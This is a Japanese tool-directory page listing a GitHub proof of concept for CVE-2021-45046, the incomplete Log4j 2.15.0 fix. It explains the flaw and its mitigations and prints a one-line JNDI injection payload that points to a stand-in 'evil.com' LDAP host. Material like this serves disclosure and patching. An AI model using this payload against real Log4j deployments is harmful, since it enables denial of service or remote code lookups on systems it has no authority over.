Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4j_CVE-2021-45046 — Log4j 2.15.0 権限昇格 -- CVE-2021-45046 | Kitploit
ツール/GitHubGitHub/cckuailong/log4j_cve-2021-45046
脆弱性分析エクスプロイトペネトレーションテスト論文と研究学習と教育
GitHubcckuailong/log4j_cve-2021-45046

Log4j_CVE-2021-45046

Log4j 2.15.0 権限昇格 -- CVE-2021-45046

リポジトリを見る
227124年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4j 2.15.0 特権昇格 -- CVE-2021-45046

攻撃

説明

Apache Log4j 2.15.0 における CVE-2021-44228 の修正が、特定の非デフォルト構成では不完全であることが判明しました。これにより、Thread Context Map (MDC) 入力データを制御できる攻撃者が、ログ設定でデフォルト以外の Pattern Layout に Context Lookup (例: $${ctx:loginId}) または Thread Context Map パターン (%X, %mdc, %MDC) を使用している場合に、JNDI Lookup パターンを用いた悪意のある入力データを作成し、サービス拒否 (DOS) 攻撃を引き起こす可能性があります。Log4j 2.15.0 では、JNDI LDAP ルックアップがデフォルトで localhost に制限されています。なお、システムプロパティ log4j2.noFormatMsgLookup を true に設定するなどの以前の緩和策は、この特定の脆弱性を緩和しません。Log4j 2.16.0 では、メッセージルックアップパターンのサポートを削除し、JNDI 機能をデフォルトで無効にすることでこの問題を修正しています。この問題は、以前のリリース (<2.16.0) では、JndiLookup クラスをクラスパスから削除することで緩和できます (例: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)。

cvss 3.7 -> 9

Poc

${jndi:ldap://127.0.0.1#evil[.]com:1389/a}

Log4shell トピック

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

reapoc への貢献を歓迎します

https://github.com/cckuailong/reapoc

ツールをダウンロード